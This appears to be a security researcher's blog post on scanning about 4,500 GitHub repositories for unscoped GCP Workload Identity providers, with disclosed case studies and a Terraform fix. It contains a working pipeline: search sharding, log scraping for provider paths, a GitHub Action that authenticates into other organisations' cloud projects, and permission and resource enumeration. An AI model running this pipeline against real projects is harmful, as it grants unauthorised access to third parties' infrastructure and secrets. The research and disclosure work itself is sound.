I Scanned 4,500 GitHub Repositories for Misconfigured GCP Workload Identity, Here's What I Found

Previous Findings

A few years ago I wrote about how misconfigured GCP Workload Identity Federation providers could allow any GitHub Actions workflow to authenticate as someone else's service account. Out of 30 repositories I checked manually, 6 were vulnerable. It made me wonder how many more were out there if I actually went looking properly.

Recap What's Still Exposed

First, a quick recap on the issue. When connecting GitHub Actions to GCP the modern answer is to use the OIDC connector. This avoids having to generate service account credentials, deal with rotating them, storing them securely etc. The OIDC connector instead creates short-lived credentials that are tied to a specific workflow run and expire shortly after. The window to do anything with them is small.

Many of the guides online miss a crucial configuration step and originally it wasn't even obvious in Google's own documentation.

Anyway, if you don't add conditions to the workflow provider to restrict the scope to a specific org, repo or workflow this means that ANY GitHub Action can use the provider.

The details used in the GitHub Action are often not stored as secrets, because technically they aren't — and many guides even reinforce that. This makes it trivial to configure your own GitHub Action targeting the same provider.

The workflow file leaks everything an attacker needs:

- uses: google-github-actions/auth@v2
  with:
    workload_identity_provider: 'projects/123456789012/locations/global/workloadIdentityPools/github-actions-idp/providers/github-actions-idp'
    service_account: 'deploy@example.iam.gserviceaccount.com'

Both values are in a public .github/workflows/ file. The provider path contains the GCP project number. Without an attribute_condition on the provider, those two strings are all you need to authenticate as that service account from any repo on GitHub.

You can check whether your own provider is misconfigured:

gcloud iam workload-identity-pools providers describe PROVIDER_ID \
  --workload-identity-pool=POOL_ID \
  --location=global \
  --format="value(attributeCondition)"
# Empty output = vulnerable

Building the Search Pipeline

GitHub Code Search is the starting point, but it caps results at 1,000 per query, so first I needed to get around that. There are some other code search platforms online, but some were paid and others just weren't getting the results I wanted.

"workload_identity_provider" "projects/" path:.github/workflows language:YAML

A single query returns around 500 unique repos. To get past the cap, I sharded the queries based on different parameters. For example, the GitHub Action version or the first digit of the GCP project number.

# Version shards — older versions are where the unmaintained repos live
queries = [
    '"google-github-actions/auth@v0" "workload_identity_provider"',
    '"google-github-actions/auth@v1" "workload_identity_provider"',
    '"google-github-actions/auth@v2" "workload_identity_provider"',
    '"google-github-actions/auth@v3" "workload_identity_provider"',
]

# Project number digit shards — catches everything regardless of pool/provider naming
for digit in range(0, 10):
    queries.append(
        f'"workload_identity_provider" "projects/{digit}" path:.github/workflows'
    )

Some repos store the provider path in a GitHub Actions variable rather than hardcoding it. The YAML won't contain the provider path, but GHA expands variables in plain text in the workflow run logs, so it's still possible to extract them by downloading the logs via the API.

import re, zipfile, io, requests

def extract_from_logs(owner, repo, token):
    runs = requests.get(
        f"https://api.github.com/repos/{owner}/{repo}/actions/runs",
        headers={"Authorization": f"Bearer {token}"}
    ).json()["workflow_runs"]

    for run in runs[:5]:
        logs_url = f"https://api.github.com/repos/{owner}/{repo}/actions/runs/{run['id']}/logs"
        r = requests.get(logs_url, headers={"Authorization": f"Bearer {token}"})
        with zipfile.ZipFile(io.BytesIO(r.content)) as z:
            for name in z.namelist():
                content = z.read(name).decode("utf-8", errors="ignore")
                match = re.search(
                    r'projects/\d+/locations/global/workloadIdentityPools/[^/]+/providers/\S+',
                    content
                )
                if match:
                    return match.group(0)

Across multiple sharding passes, this brought the total to 4,565 unique repositories with WIF configured.

Verifying at Scale

Manually checking 4,565 repos isn't feasible. Instead, I built a GitHub Action that uses a matrix to attempt authentication against each extracted provider/service account pair and records whether it succeeds:

jobs:
  verify:
    strategy:
      fail-fast: false
      matrix:
        target: ${{ fromJson(needs.load.outputs.targets) }}
    runs-on: ubuntu-latest
    permissions:
      id-token: write
      contents: read
    steps:
      - name: Attempt WIF authentication
        id: auth
        uses: google-github-actions/auth@v2
        with:
          workload_identity_provider: ${{ matrix.target.provider }}
          service_account: ${{ matrix.target.service_account }}
          token_format: access_token
        continue-on-error: true

      - name: Record result
        run: |
          echo "${{ matrix.target.repo }},${{ steps.auth.outcome }}" >> results.csv

Out of the repos that had extractable provider properties, there were 63 confirmed vulnerable. The WIF provider accepted the token from an entirely unrelated GitHub repository outside their organisation entirely.

Proving Impact

Confirming authentication was just the first step. Being able to connect to a GCP project from an unrelated repository is a misconfiguration but on its own it doesn't tell you much. What matters is what you can actually do once you're in. For each vulnerable provider I used GCP's testIamPermissions API to check a broad list of permissions in a single request, then used those results to enumerate whatever resources were accessible.

- name: Test IAM permissions
  run: |
    PROJECT="${{ inputs.project_id }}"
    TOKEN="${{ steps.auth.outputs.access_token }}"

    PERMS='{
      "permissions": [
        "compute.instances.list", "compute.instances.create", "compute.instances.delete",
        "run.services.create", "run.services.delete",
        "cloudfunctions.functions.create",
        "secretmanager.versions.access",
        "storage.objects.get", "storage.objects.create", "storage.objects.delete",
        "artifactregistry.repositories.uploadArtifacts",
        "artifactregistry.repositories.downloadArtifacts",
        "iam.serviceAccounts.list", "resourcemanager.projects.getIamPolicy",
        "container.clusters.list", "bigquery.datasets.get"
      ]
    }'

    curl -s -X POST \
      "https://cloudresourcemanager.googleapis.com/v1/projects/${PROJECT}:testIamPermissions" \
      -H "Authorization: Bearer ${TOKEN}" \
      -H "Content-Type: application/json" \
      -d "$PERMS" | jq -r '.permissions[]' | sort

- name: Enumerate resources
  run: |
    gcloud compute instances list --project=$PROJECT --format=json
    gcloud secrets list --project=$PROJECT --format=json
    gcloud artifacts repositories list --project=$PROJECT --format=json
    gcloud run services list --project=$PROJECT --format=json

The permissions varied widely across the 63 vulnerable accounts. Many had read-only access to a handful of storage buckets or Cloud Run services. Real misconfigurations, but limited in what an attacker could actually do with them. There were many others cases that were much more severe though.

What I Found

A UK-based online travel company

Their CI/CD service account had artifactregistry.repositories.downloadArtifacts on a registry containing 866 Docker images. A lot of these were copies of public images used as part of their build tooling, but a significant subset were proprietary microservices. I pulled one of those from an unrelated GitHub repository and the image contained JavaScript source maps that would allow full reconstruction of the original source code. The eu.gcr.io repository alone was 12.7 TB. The registry also contained Maven snapshots (2 TB), npm packages, and build artefacts for payment processing, booking engine, and third-party integrations.

Confirmed permissions:
  artifactregistry.repositories.downloadArtifacts
  artifactregistry.dockerimages.get / list
  artifactregistry.packages.get / list
  storage.objects.create / get / list
  resourcemanager.projects.get

Registry: eu.gcr.io — 12.7 TB, 866 images (selected proprietary)
  b*****g-service         p*****t-service         c*****t-service
  a*****s-ticketing-service  f*****b-service      c*****r-account-service
  b*****g-engine          s*****h-service         q*****d-service
  a*****t-service         c*****n-service         j*****y-service
  v*****d-service         p*****n-service         p*****t-hub
  ... and ~850 more

          maven-snapshots — 2 TB
          remote-dockerhub — 70 GB (pull-through cache)

I submitted this through their bug bounty programme and they were excellent to work with. They responded quickly, took it seriously and even added a $500 bonus on top of the bounty, bringing the total payout to $3,500.

A blockchain network's testnet infrastructure

This one had 30 confirmed permissions, the broadest attack surface of any account in the dataset. The service account could create and delete Compute Engine VMs, deploy arbitrary Cloud Run services and Cloud Functions, read Secret Manager values, and write to storage. There were 7 running VMs at the time of discovery, including GKE node pool instances across two regions and a bastion host.

Confirmed permissions (selected):
  compute.instances.create / delete / list   ← spin up miners or destroy the testnet
  cloudfunctions.functions.create            ← deploy arbitrary code
  run.services.create / delete
  secretmanager.versions.access              ← read all secrets (validator keys, API creds)
  storage.objects.create / get / delete
  artifactregistry.repositories.uploadArtifacts
  resourcemanager.projects.getIamPolicy      ← read IAM bindings for escalation

Running VMs:
  gke-g*****h-testnet-m-g*****d-******2b-****  (us-central1-a, e2-standard-4)
  gke-g*****h-testnet-m-g*****d-******2b-****  (us-central1-a, e2-standard-4)
  gke-g*****h-testnet-m-g*****d-******2b-****  (us-central1-a, e2-standard-4)
  gke-g*****h-testnet-m-g*****d-******2b-****  (us-central1-a, e2-standard-4)
  g*****h-bastion-host                          (us-central1-a, f1-micro)
  gke-g*****h-testnet-a-g*****d-******39-****  (asia-southeast1-a, e2-standard-4)
  gke-g*****h-testnet-a-g*****d-******39-****  (asia-southeast1-a, e2-standard-4)

For a blockchain network this is particularly sensitive. The secretmanager.versions.access permission likely covers validator keys and infrastructure credentials. compute.instances.create on the same machine types already running in the project would allow an attacker to run cryptocurrency miners at the target's expense.

An NIH-funded biomedical research institution

The exposed service account had artifactregistry.repositories.uploadArtifacts. This is an NIH-funded research project that publishes open-source tools used by research institutions worldwide. The concern here wasn't data access, it was supply chain. A malicious package pushed to their registry could end up in research pipelines globally before anyone noticed. There were also 5 running Compute Engine VMs including a disease variant prioritisation service and an ontology lookup system.

Confirmed permissions:
  artifactregistry.repositories.uploadArtifacts   ← push malicious packages
  artifactregistry.repositories.list
  compute.instances.list
  compute.disks.list
  resourcemanager.projects.get

Running VMs:
  m*****r-exomiser        (disease variant prioritisation, 4 vCPU / 12 GB)
  m*****r-ols4            (ontology lookup service)
  data-proxy              (knowledge graph data proxy)
  jenkins-server-vm       (CI/CD server)
  m*****r-gh-issues-redis (Redis)

The institution's cybersecurity team were very quick to respond and resolve the issue. They were also happy for this to be included as a case study in this post.

All of the other repositories I found were also notified about the vulnerability. That included a number of student accounts who were happy to learn from the misconfiguration, which was a nice outcome.

The Fix

Lock the provider to a specific repository:

resource "google_iam_workload_identity_pool_provider" "github" {
  # ... existing config ...

  # Lock to a specific repo:
  attribute_condition = "assertion.repository == 'my-org/my-repo'"

  # Or lock to your org (allows all repos under the org):
  # attribute_condition = "assertion.repository_owner == 'my-org'"
}

A Note on AWS

Something worth pointing out is that I didn't find the same issue at scale with AWS. I don't think that's because AWS users are more security-conscious. The difference comes down to documentation. AWS makes it explicit in their OIDC guides that you need to scope the trust policy to a specific repo or org, and the examples show that clearly. GCP's documentation gave the impression that just setting up the provider was enough and that the credential-less approach was inherently secure. If you didn't already understand how OIDC trust actually works, it was easy to follow the guide, have everything working, and have no idea you'd left the door open to anyone on GitHub.

It has been a few years since the first post and this one but I think the time was well spent. The issues are still out there and this time around the work demonstrated that they can have real impact. It is not just misconfigured student projects, it is production infrastructure at companies and research institutions that people rely on.